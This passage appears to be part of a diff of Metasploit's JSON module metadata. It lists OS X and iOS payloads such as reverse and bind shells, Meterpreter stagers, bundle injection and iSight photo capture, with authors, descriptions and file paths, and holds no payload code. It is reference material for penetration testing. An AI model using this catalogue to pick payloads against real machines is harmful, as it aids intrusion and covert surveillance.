false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/execute/bind_tcp": { - "name": "OS X Write and Execute Binary, Bind TCP Stager", - "fullname": "payload/osx/armle/execute/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/execute/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 
false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/execute", - "stager_refname": "osx/armle/bind_tcp" - }, - "payload_osx/armle/execute/reverse_tcp": { - "name": "OS X Write and Execute Binary, Reverse TCP Stager", - "fullname": "payload/osx/armle/execute/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/execute/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/execute", - "stager_refname": "osx/armle/reverse_tcp" - }, - "payload_osx/armle/shell/bind_tcp": { - "name": "OS X Command Shell, Bind TCP Stager", - "fullname": "payload/osx/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/shell", - 
"stager_refname": "osx/armle/bind_tcp" - }, - "payload_osx/armle/shell/reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/armle/shell", - "stager_refname": "osx/armle/reverse_tcp" - }, - "payload_osx/armle/shell_bind_tcp": { - "name": "Apple iOS Command Shell, Bind TCP Inline", - "fullname": "payload/osx/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/shell_reverse_tcp": { - "name": "Apple iOS Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/armle/shell_reverse_tcp", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/armle/vibrate": { - "name": "Apple iOS iPhone Vibrate", - "fullname": "payload/osx/armle/vibrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.\n Based on work by Charlie Miller .", - "references": [], - "platform": "OSX", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/armle/vibrate.rb", - "is_install_path": true, - "ref_name": "osx/armle/vibrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/ppc/shell/bind_tcp": { - "name": "OS X Command Shell, Bind TCP Stager", - "fullname": "payload/osx/ppc/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 
"targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/bind_tcp" - }, - "payload_osx/ppc/shell/find_tag": { - "name": "OS X Command Shell, Find Tag Stager", - "fullname": "payload/osx/ppc/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/find_tag" - }, - "payload_osx/ppc/shell/reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/ppc/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", - "is_install_path": true, - "ref_name": 
"osx/ppc/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/ppc/shell", - "stager_refname": "osx/ppc/reverse_tcp" - }, - "payload_osx/ppc/shell_bind_tcp": { - "name": "OS X Command Shell, Bind TCP Inline", - "fullname": "payload/osx/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/ppc/shell_reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/dupandexecve/bind_tcp": { - 
"name": "OS X dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/osx/x64/dupandexecve/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "nemo " - ], - "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/dupandexecve/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/bind_tcp" - }, - "payload_osx/x64/dupandexecve/reverse_tcp": { - "name": "OS X dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/x64/dupandexecve/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "nemo " - ], - "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/dupandexecve/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/reverse_tcp" - }, - "payload_osx/x64/dupandexecve/reverse_tcp_uuid": { - "name": "OS X dup2 Command Shell, Reverse 
TCP Stager with UUID Support (OSX x64)", - "fullname": "payload/osx/x64/dupandexecve/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo", - "timwr" - ], - "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "osx/x64/dupandexecve/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/reverse_tcp_uuid" - }, - "payload_osx/x64/exec": { - "name": "OS X x64 Execute Command", - "fullname": "payload/osx/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/exec.rb", - "is_install_path": true, - "ref_name": "osx/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/meterpreter/bind_tcp": { - "name": "OSX Meterpreter, Bind TCP Stager", - "fullname": "payload/osx/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - 
"nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/bind_tcp" - }, - "payload_osx/x64/meterpreter/reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Stager", - "fullname": "payload/osx/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - "nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/reverse_tcp" - }, - "payload_osx/x64/meterpreter/reverse_tcp_uuid": { - "name": 
"OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)", - "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/reverse_tcp_uuid" - }, - "payload_osx/x64/meterpreter_reverse_http": { - "name": "OSX Meterpreter, Reverse HTTP Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - 
"staged": false - }, - "payload_osx/x64/meterpreter_reverse_https": { - "name": "OSX Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/meterpreter_reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/say": { - "name": "OS X x64 say Shellcode", - "fullname": "payload/osx/x64/say", - "aliases": [], - "rank": 300, - "disclosure_date": null, - 
"type": "payload", - "author": [ - "nemo " - ], - "description": "Say an arbitrary string outloud using Mac OS X text2speech", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/say.rb", - "is_install_path": true, - "ref_name": "osx/x64/say", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_bind_tcp": { - "name": "OS X x64 Shell Bind TCP", - "fullname": "payload/osx/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_find_tag": { - "name": "OSX Command Shell, Find Tag Inline", - "fullname": "payload/osx/x64/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/osx/x64/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_reverse_tcp": { - "name": "OS X x64 Shell Reverse TCP", - "fullname": "payload/osx/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/bundleinject/bind_tcp": { - "name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager", - "fullname": "payload/osx/x86/bundleinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/bundleinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/bundleinject", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/bundleinject/reverse_tcp": { - "name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager", - "fullname": "payload/osx/x86/bundleinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/bundleinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/bundleinject", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/exec": { - "name": "OS X Execute Command", - "fullname": "payload/osx/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "snagg ", - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/exec.rb", - "is_install_path": true, - "ref_name": "osx/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/isight/bind_tcp": { - "name": "Mac OS X x86 iSight Photo Capture, Bind TCP 
Stager", - "fullname": "payload/osx/x86/isight/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/isight/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/isight", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/isight/reverse_tcp": { - "name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager", - "fullname": "payload/osx/x86/isight/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/isight/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/isight", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/shell_bind_tcp": { - "name": "OS X Command Shell, Bind TCP Inline", - "fullname": 
"payload/osx/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/shell_find_port": { - "name": "OS X Command Shell, Find Port Inline", - "fullname": "payload/osx/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/shell_reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/vforkshell/bind_tcp": { - "name": "OS X (vfork) Command Shell, Bind TCP Stager", - "fullname": "payload/osx/x86/vforkshell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/vforkshell", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/vforkshell/reverse_tcp": { - "name": "OS X (vfork) Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/x86/vforkshell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 
